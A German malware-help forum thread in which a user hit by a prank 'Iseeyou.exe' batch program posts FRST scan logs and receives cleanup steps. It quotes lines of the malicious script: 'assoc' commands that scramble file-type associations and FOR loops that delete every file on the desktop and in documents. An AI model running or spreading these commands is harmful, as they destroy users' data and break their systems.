Trojaner-Board - Iseeyou exe mit Bat ausführung Entfernt alle Funktionen und erstellt tausende Ordner

Trojaner-Board (https://www.trojaner-board.de/)

- Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)

- - Iseeyou exe mit Bat ausführung Entfernt alle Funktionen und erstellt tausende Ordner (https://www.trojaner-board.de/154944-iseeyou-exe-bat-ausfuehrung-entfernt-alle-funktionen-erstellt-tausende-ordner.html)

Iseeyou exe mit Bat ausführung Entfernt alle Funktionen und erstellt tausende Ordner

Hey, hab von nem dummen Freund nen Virus bekommen, der bei mir alles deaktiviert hat, sogar die Systemwiederherstellung o.o dieser hat meinen Desktop mit leeren ordnern gefüllt und neugestartet. es war eine .exe die Iseeyou hieß... Kann mir jemand helfen die Systemwiederherstellung wieder anzukriegen? Windows update funktioniert auch nicht.... :/

Hier ist die Virusdatei !!!! VIRUS !!!! nur hier um mir zu helfen !!!

[EDIT] Die ordner werden denke ich so erstellt:

:hallo:

Mein Name ist Jürgen und ich werde Dir bei Deinem Problem behilflich sein. Zusammen schaffen wir das...:abklatsch:

Bitte arbeite alle Schritte der Reihe nach ab.
Lese die Anleitungen sorgfältig durch bevor Du beginnst. Wenn es Probleme gibt oder Du etwas nicht verstehst, dann stoppe mit Deiner Ausführung und beschreibe mir das Problem.
Führe bitte nur Scans durch, zu denen Du von mir aufgefordert wurdest.
Bitte kein Crossposting (posten in mehreren Foren).
Installiere oder deinstalliere während der Bereinigung keine Software, außer Du wurdest dazu aufgefordert.
Speichere alle unsere Tools auf dem Desktop ab.
Poste die Logfiles direkt in Deinen Thread in Code-Tags.
Bedenke, dass wir hier alle während unserer Freizeit tätig sind, wenn du innerhalb von 24 Stunden nichts von mir liest, dann schreibe mir bitte eine PM.

Hinweis:
Ich kann Dir niemals eine Garantie geben, dass wir alle schädlichen Dateien finden werden.
Eine Formatierung ist meist der schnellere und immer der sicherste Weg, aber auch nur bei wirklicher Malware empfehlenswert.
Adware & Co. können wir sehr gut entfernen.
Solltest Du Dich für eine Bereinigung entscheiden, arbeite solange mit, bis Du mein clean :daumenhoc bekommst.

Los geht's:

Schritt 1
http://filepony.de/icon/frst.png http://deeprybka.trojaner-board.de/b...t/frstscan.png

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:

FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)

Starte jetzt FRST.
Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

Lesestoff
Posten in CODE-Tags: So gehts...
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert uns massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

http://deeprybka.trojaner-board.de/tdss/codetags.gif

Hallo

Alle meine .exe Dateien wurden zu .mp3 geändert, deshalb fehlen auch die ganzen Einstellungen.

FRST Logfile:

FRST Logfile:

Code:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 06-06-2014

Ran by Alex (administrator) on RATTE-PC on 08-06-2014 14:03:23

Running from C:\Users\Alex\Downloads

Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: German Standard

Internet Explorer Version 8

Boot Mode: Normal
 
 

==================== Processes (Whitelisted) =================
 

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe

(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe

(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe

() C:\Windows\SysWOW64\PnkBstrA.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe

(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

(Microsoft Corporation) C:\Windows\System32\wbengine.exe
 
 

==================== Registry (Whitelisted) ==================
 

HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [3890208 2014-06-06] (AVAST Software)

HKU\S-1-5-21-3404557297-3964321256-2790162842-1000\...\Run: [AdobeBridge] => [X]

HKU\S-1-5-21-3404557297-3964321256-2790162842-1000\...\Run: [Steam] => C:\Program Files (x86)\\Steam.exe -silent

HKU\S-1-5-21-3404557297-3964321256-2790162842-1000\...\Run: [BRS] => C:\Program Files (x86)\Speedial\BRS\brs.exe -runBRS

HKU\S-1-5-21-3404557297-3964321256-2790162842-1000\...\MountPoints2: {c6587b59-c9f6-11e3-bfd6-00027223ff7d} - F:\AUTORUN.EXE

HKU\S-1-5-21-3404557297-3964321256-2790162842-1003\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [21444224 2014-05-08] (Skype Technologies S.A.)

HKU\S-1-5-21-3404557297-3964321256-2790162842-1003\...\Run: [AdobeBridge] => [X]

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Stickies.lnk

ShortcutTarget: Stickies.lnk -> C:\Program Files (x86)\Stickies\stickies.exe (Zhorn Software)

GroupPolicyUsers\S-1-5-32-545\User: Group Policy restriction detected <======= ATTENTION

GroupPolicyUsers\S-1-5-21-3404557297-3964321256-2790162842-1002\User: Group Policy restriction detected <======= ATTENTION
 

==================== Internet (Whitelisted) ====================
 

##Private
 

FireFox:

========
 

##Private
 

Chrome: 

=======
 

##Private
 

==================== Services (Whitelisted) =================
 

S4 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [144152 2013-10-11] (SUPERAntiSpyware.com)

R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-08-06] (Advanced Micro Devices, Inc.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-05-10] (AVAST Software)

S4 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [377616 2014-04-08] (LogMeIn, Inc.)

R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-05-29] ()

S4 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
 

==================== Drivers (Whitelisted) ====================
 

R2 AODDriver4.1; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [53888 2012-03-05] (Advanced Micro Devices)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-05-10] ()

R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [79184 2014-05-10] (AVAST Software)

R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-05-10] (AVAST Software)

R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-05-10] ()

R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1039096 2014-05-15] (AVAST Software)

R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [423240 2014-05-15] (AVAST Software)

R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [85328 2014-05-15] (AVAST Software)

R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [208416 2014-05-10] ()

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2014-04-22] (Disc Soft Ltd)

S3 EverestDriver; C:\Users\Alex\AppData\Local\Temp\EverestDriver.sys [9728 2005-08-18] ()

R2 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)

R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)

R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)

S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-14] (Brother Industries Ltd.)

R3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [31232 2009-09-16] (Tunngle.net)

S3 wolfkr; \??\C:\AeriaGames\WolfTeam-DE\avital\wolfk64.sys [X]

S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
 

==================== NetSvcs (Whitelisted) ===================
 
 

==================== One Month Created Files and Folders ========
 

## Not for u
 
 

==================== Bamital & volsnap Check =================
 

C:\Windows\System32\winlogon.exe => MD5 is legit

C:\Windows\System32\wininit.exe => MD5 is legit

C:\Windows\SysWOW64\wininit.exe => MD5 is legit

C:\Windows\explorer.exe => MD5 is legit

C:\Windows\SysWOW64\explorer.exe => MD5 is legit

C:\Windows\System32\svchost.exe => MD5 is legit

C:\Windows\SysWOW64\svchost.exe => MD5 is legit

C:\Windows\System32\services.exe => MD5 is legit

C:\Windows\System32\User32.dll => MD5 is legit

C:\Windows\SysWOW64\User32.dll => MD5 is legit

C:\Windows\System32\userinit.exe => MD5 is legit

C:\Windows\SysWOW64\userinit.exe => MD5 is legit

C:\Windows\System32\rpcss.dll => MD5 is legit

C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
 
 

LastRegBack: 2014-05-31 14:37
 

==================== End Of Log ============================

--- --- ---

--- --- ---

Addition

Code:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06-06-2014

Ran by Alex at 2014-06-08 14:04:00

Running from C:\Users\Alex\Downloads

Boot Mode: Normal

==========================================================
 
 

==================== Security Center ========================
 

AV: avast! Antivirus (Enabled - Up to date)

AS: Windows Defender (Enabled - Out of date) 

AS: avast! Antivirus (Enabled - Up to date) 
 

==================== Installed Programs ======================
 

## Not ur Problem ^^
 

==================== Restore Points  =========================
 

05-06-2014 10:05:21 Geplanter Prüfpunkt
 

==================== Hosts content: ==========================

##
 
 

==================== Scheduled Tasks (whitelisted) =============
 

Task: - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2014-05-10] (AVAST Software)

Task: {218835C3-B24F-4E19-A28D-9C915D50C102} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)

Task: {351FF4FA-A98F-4631-BFD0-CA6AE7AA4B81} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-06-03] (Google Inc.)

Task: {4648ED3A-8F6F-4FA8-B6D5-78329D3BB4F5} - \AmiUpdXp No Task File <==== ATTENTION

Task: {7F917CC2-E81C-4C4D-8004-CEA9E70B8826} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-06-03] (Google Inc.)

Task: {A1A0F160-F48D-4AE8-8084-820017893A29} - \Speedial No Task File <==== ATTENTION

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 

==================== Loaded Modules (whitelisted) =============
 

2014-04-05 15:26 - 2013-07-10 14:05 - 00087328 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll

2012-08-06 12:24 - 2012-08-06 12:24 - 00212480 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.PerformanceTuning.dll

2012-03-05 16:03 - 2012-03-05 16:03 - 00677376 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Device.dll

2012-02-16 14:53 - 2012-02-16 14:53 - 03642880 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Platform.dll

2014-04-07 18:29 - 2014-05-29 14:44 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe

2014-05-21 13:56 - 2008-06-20 00:41 - 00062464 _____ () C:\Program Files (x86)\WinRAR\rarext64.dll

2014-06-08 10:15 - 2014-06-08 10:15 - 02775040 _____ () C:\Program Files\AVAST Software\Avast\defs\14060800\algo.dll

2014-04-05 16:13 - 2014-03-15 10:40 - 03642480 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
 

==================== Alternate Data Streams (whitelisted) =========
 
 

==================== Safe Mode (whitelisted) ===================
 

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
 

==================== EXE Association (whitelisted) =============
 

HKLM\...\.exe: .txt =>  <===== ATTENTION!
 

==================== Disabled items from MSCONFIG ==============
 

MSCONFIG\Services: !SASCORE => 2

MSCONFIG\Services: AdobeARMservice => 2

MSCONFIG\Services: ArcService => 3

MSCONFIG\Services: gupdate => 2

MSCONFIG\Services: gupdatem => 3

MSCONFIG\Services: Hamachi2Svc => 2

MSCONFIG\Services: LMIGuardianSvc => 2

MSCONFIG\Services: MozillaMaintenance => 3

MSCONFIG\Services: rpcapd => 3

MSCONFIG\Services: SkypeUpdate => 2

MSCONFIG\Services: SwitchBoard => 3

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Status Monitor.lnk => C:\Windows\pss\Status Monitor.lnk.CommonStartup

MSCONFIG\startupreg: SUPERAntiSpyware => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe

MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
 

##Some of them are not ur Problem ^^
 

==================== Faulty Device Manager Devices =============
 

Name: Hamachi Network Interface

Description: Hamachi Network Interface

Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}

Manufacturer: LogMeIn, Inc.

Service: hamachi

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 

Name: USB (Universal Serial Bus)-Controller

Description: USB (Universal Serial Bus)-Controller

Class Guid: 

Manufacturer: 

Service: 

Problem: : The drivers for this device are not installed. (Code 28)

Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 

==================== Event log errors: =========================
 

Application errors:

==================

Error: (06/08/2014 02:01:16 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 

Error: (06/08/2014 01:45:57 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Name der fehlerhaften Anwendung: Fuel.Service.exe, Version: 1.0.0.0, Zeitstempel: 0x501fefb5

Name des fehlerhaften Moduls: Device.dll, Version: 4.1.0.0, Zeitstempel: 0x4f55e10b

Ausnahmecode: 0xc0000005

Fehleroffset: 0x00000000000033c1

ID des fehlerhaften Prozesses: 0x710

Startzeit der fehlerhaften Anwendung: 0xFuel.Service.exe0

Pfad der fehlerhaften Anwendung: Fuel.Service.exe1

Pfad des fehlerhaften Moduls: Fuel.Service.exe2

Berichtskennung: Fuel.Service.exe3
 

Error: (06/08/2014 01:33:16 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Name der fehlerhaften Anwendung: Fuel.Service.exe, Version: 1.0.0.0, Zeitstempel: 0x501fefb5

Name des fehlerhaften Moduls: Device.dll, Version: 4.1.0.0, Zeitstempel: 0x4f55e10b

Ausnahmecode: 0xc0000005

Fehleroffset: 0x00000000000033c1

ID des fehlerhaften Prozesses: 0x720

Startzeit der fehlerhaften Anwendung: 0xFuel.Service.exe0

Pfad der fehlerhaften Anwendung: Fuel.Service.exe1

Pfad des fehlerhaften Moduls: Fuel.Service.exe2

Berichtskennung: Fuel.Service.exe3
 

Error: (06/08/2014 01:29:17 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 

Error: (06/08/2014 01:26:56 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Name der fehlerhaften Anwendung: Fuel.Service.exe, Version: 1.0.0.0, Zeitstempel: 0x501fefb5

Name des fehlerhaften Moduls: Device.dll, Version: 4.1.0.0, Zeitstempel: 0x4f55e10b

Ausnahmecode: 0xc0000005

Fehleroffset: 0x00000000000033c1

ID des fehlerhaften Prozesses: 0x6fc

Startzeit der fehlerhaften Anwendung: 0xFuel.Service.exe0

Pfad der fehlerhaften Anwendung: Fuel.Service.exe1

Pfad des fehlerhaften Moduls: Fuel.Service.exe2

Berichtskennung: Fuel.Service.exe3
 

Error: (06/08/2014 01:26:03 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 

Error: (06/08/2014 01:23:44 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Name der fehlerhaften Anwendung: Fuel.Service.exe, Version: 1.0.0.0, Zeitstempel: 0x501fefb5

Name des fehlerhaften Moduls: Device.dll, Version: 4.1.0.0, Zeitstempel: 0x4f55e10b

Ausnahmecode: 0xc0000005

Fehleroffset: 0x00000000000033c1

ID des fehlerhaften Prozesses: 0x710

Startzeit der fehlerhaften Anwendung: 0xFuel.Service.exe0

Pfad der fehlerhaften Anwendung: Fuel.Service.exe1

Pfad des fehlerhaften Moduls: Fuel.Service.exe2

Berichtskennung: Fuel.Service.exe3
 

Error: (06/08/2014 00:55:05 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 

Error: (06/08/2014 00:51:24 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Name der fehlerhaften Anwendung: Fuel.Service.exe, Version: 1.0.0.0, Zeitstempel: 0x501fefb5

Name des fehlerhaften Moduls: Device.dll, Version: 4.1.0.0, Zeitstempel: 0x4f55e10b

Ausnahmecode: 0xc0000005

Fehleroffset: 0x00000000000033c1

ID des fehlerhaften Prozesses: 0x704

Startzeit der fehlerhaften Anwendung: 0xFuel.Service.exe0

Pfad der fehlerhaften Anwendung: Fuel.Service.exe1

Pfad des fehlerhaften Moduls: Fuel.Service.exe2

Berichtskennung: Fuel.Service.exe3
 

Error: (06/08/2014 00:49:09 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Name der fehlerhaften Anwendung: Fuel.Service.exe, Version: 1.0.0.0, Zeitstempel: 0x501fefb5

Name des fehlerhaften Moduls: Device.dll, Version: 4.1.0.0, Zeitstempel: 0x4f55e10b

Ausnahmecode: 0xc0000005

Fehleroffset: 0x00000000000033c1

ID des fehlerhaften Prozesses: 0x73c

Startzeit der fehlerhaften Anwendung: 0xFuel.Service.exe0

Pfad der fehlerhaften Anwendung: Fuel.Service.exe1

Pfad des fehlerhaften Moduls: Fuel.Service.exe2

Berichtskennung: Fuel.Service.exe3
 
 

System errors:

=============

Error: (06/08/2014 01:45:58 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: Dienst "AMD FUEL Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
 

Error: (06/08/2014 01:33:17 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: Dienst "AMD FUEL Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
 

Error: (06/08/2014 01:26:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: Dienst "AMD FUEL Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
 

Error: (06/08/2014 01:25:25 PM) (Source: DCOM) (EventID: 10016) (User: RATTE-PC)

Description: AnwendungsspezifischLokalAktivierung{8BC3F05E-D86B-11D0-A075-00C04FB68820}{8BC3F05E-D86B-11D0-A075-00C04FB68820}RATTE-PCGastS-1-5-21-3404557297-3964321256-2790162842-501LocalHost (unter Verwendung von LRPC)
 

Error: (06/08/2014 01:25:25 PM) (Source: DCOM) (EventID: 10016) (User: RATTE-PC)

Description: AnwendungsspezifischLokalAktivierung{8BC3F05E-D86B-11D0-A075-00C04FB68820}{8BC3F05E-D86B-11D0-A075-00C04FB68820}RATTE-PCGastS-1-5-21-3404557297-3964321256-2790162842-501LocalHost (unter Verwendung von LRPC)
 

Error: (06/08/2014 01:25:25 PM) (Source: DCOM) (EventID: 10016) (User: RATTE-PC)

Description: AnwendungsspezifischLokalAktivierung{8BC3F05E-D86B-11D0-A075-00C04FB68820}{8BC3F05E-D86B-11D0-A075-00C04FB68820}RATTE-PCGastS-1-5-21-3404557297-3964321256-2790162842-501LocalHost (unter Verwendung von LRPC)
 

Error: (06/08/2014 01:23:45 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: Dienst "AMD FUEL Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
 

Error: (06/08/2014 00:52:41 PM) (Source: Service Control Manager) (EventID: 7001) (User: )

Description: Der Dienst "Computerbrowser" ist vom Dienst "Server" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: 

%%1068
 

Error: (06/08/2014 00:52:41 PM) (Source: Service Control Manager) (EventID: 7001) (User: )

Description: Der Dienst "Computerbrowser" ist vom Dienst "Server" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: 

%%1068
 

Error: (06/08/2014 00:52:41 PM) (Source: Service Control Manager) (EventID: 7001) (User: )

Description: Der Dienst "Computerbrowser" ist vom Dienst "Server" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: 

%%1068
 
 

Microsoft Office Sessions:

=========================
 

CodeIntegrity Errors:

===================================

  Date: 2014-05-11 08:40:08.798

  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\Users\Alex\AppData\Local\Temp\EverestDriver.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
 

  Date: 2014-05-11 08:40:08.784

  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\Users\Alex\AppData\Local\Temp\EverestDriver.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
 

  Date: 2014-05-11 08:40:08.492

  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\Lavalys\EVEREST Home Edition\kerneld.amd64" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
 

  Date: 2014-05-11 08:40:08.484

  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\Lavalys\EVEREST Home Edition\kerneld.amd64" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
 
 

==================== Memory info =========================== 
 

Percentage of memory in use: 39%

Total physical RAM: 4077.54 MB

Available physical RAM: 2478.1 MB

Total Pagefile: 8153.27 MB

Available Pagefile: 6436.42 MB

Total Virtual: 8192 MB

Available Virtual: 8191.79 MB
 

==================== Drives ================================
 

Drive c: () (Fixed) (Total:540.79 GB) (Free:242.11 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

Drive d: (Backups) (Fixed) (Total:390.62 GB) (Free:280.61 GB) NTFS

Drive e: (Realschule 2014) (CDROM) (Total:0.01 GB) (Free:0 GB) CDFS
 

==================== MBR & Partition Table ==================
 

========================================================

Disk: 0 (MBR Code: Windows 7 or 8) (Size: 932 GB) (Disk ID: C9C04E1F)

Partition 1: (Active) - (Size=541 GB) - (Type=07 NTFS)

Partition 2: (Not Active) - (Size=391 GB) - (Type=07 NTFS)
 

==================== End Of Log ============================

Ich habe gerade den Code bekommen:

Dashier ist er :) Bitte ein gegenmittel geben XD

Den Code kannste ganz schnell wieder rausmachen hier. Und auch den Download-Link oben oder die exe raus. Wir verteilen hier keine Schadprogramme.

Haste die Ordner per Hand gelöscht oder?

Der Code ist schon weg, aber das was er verursacht hat macht mir Probleme :/
Ja, per hand gelöscht hab ichs, hat ja gestört

ich kann den Link irgendwie nicht löschen o.o

WTF XD
assoc .txt=.mp3
assoc .exe=.txt
assoc .jpeg=.exe
assoc .png=.avi
assoc .mpeg=.png

Dashier macht die probleme, kann mir jemand ein gegenscript geben?

Was genau Löscht der hier?:

cd %userprofile%\desktop
FOR %%A IN (*.*) DO DEL %%A

cd %userprofile%\documents
FOR %%A IN (*.*) DO DEL %%A

cd %userprofile%\desktop

Du sollst den Code und den Link bzw. die exe welche Du hier gepostet hast bitte entfernen!

Zitat:

Zitat von deeprybka (Beitrag 1312909)

Du sollst den Code und den Link bzw. die exe welche Du hier gepostet hast bitte entfernen!

Das geht irgendwie nicht,der Editierbutton fehlt :/ kann nicht ein Admin oder Moderator das machen?

Du hast den Code doch erst um 14:30h gepostet. Kannst den Codeden Post nicht editieren und rausnehmen?

Und warte bitte auf weitere Anweisungen. Wie jeder andere User auch.

Zitat:

Zitat von deeprybka (Beitrag 1312915)

Du hast den Code doch erst um 14:30h gepostet. Kannst den Codeden Post nicht editieren und rausnehmen?

Und warte bitte auf weitere Anweisungen. Wie jeder andere User auch.

Genau, es geht nicht... man sollte das irgendwie fixen ^^

Code:

@echo off
 

assoc .mp3=.txt

assoc .txt=.exe

assoc .exe=.jpeg

assoc .avi=.png

assoc .png=.mpeg

Würde dieser Code alles zurücksetzen, wenn ichs in eine .exe konvertiere?

[EDIT]
Mein Problem besteht nochimmer, auch wenns sich wie gelöst anhört, danke für die Hilfe bis jetzt ;D

[EDIT2]
Super ! danke für das entfernen der Links und des geposteten Codes :D

Deine FRST-Logs haben vorhin ganz anders ausgesehen. Was soll das?

Sry -.- :dankeschoen:

Warum hast Du Deine FRST-Logs editiert?

Ich kann gerade nicht sehr klar denken, weil ich anfangs durch die Probleme aufgewühlt war :headbang:... Die FRST-Logs beinhalten teils Private Dinge, die nicht verbreitet werden sollten... Deshalb habe ich sie so bearbeitet, das sie nicht beim Arbeiten behindern und auch nicht alles über meinen PC verraten.

Danke für dein Verständnis! :daumenhoc

Tschuldigung, falls dich das etwas verstört hat, ich kenne mich nur auch gut mit PCs aus und wollte beim Fortschritt helfen, was denke ich keine gute Idee war...

Zudem will ich auch meine Dinge meine bleiben lassen, hoffe du verstehst das ^^

PS: http://www.trojaner-board.de/154950-...abzieht-d.html :)

PSS: brauche immernoch hilfe :/

Schritt 1

http://filepony.de/icon/frst.png http://deeprybka.trojaner-board.de/b...st/frstfix.png

Drücke bitte die http://deeprybka.trojaner-board.de/b...ne/revo/w7.png + R Taste und schreibe notepad in das Ausführen Fenster.
Klicke auf OK und kopiere nun den Text aus der Codebox in das leere Textdokument:

Code:

cmd: assoc

GroupPolicyUsers\S-1-5-32-545\User: Group Policy restriction detected <======= ATTENTION

GroupPolicyUsers\S-1-5-21-3404557297-3964321256-2790162842-1002\User: Group Policy restriction detected <======= ATTENTION

HKLM\...\.exe: .txt =>  <===== ATTENTION!

Speichere dieses bitte als Fixlist.txt in das Verzeichnis ab, in dem sich auch die FRST-Anwendung befindet.

Starte FRST und drücke auf den Fix-Button.
Das Tool erstellt eine "Fixlog.txt" -Datei.
Poste mir bitte deren Inhalt.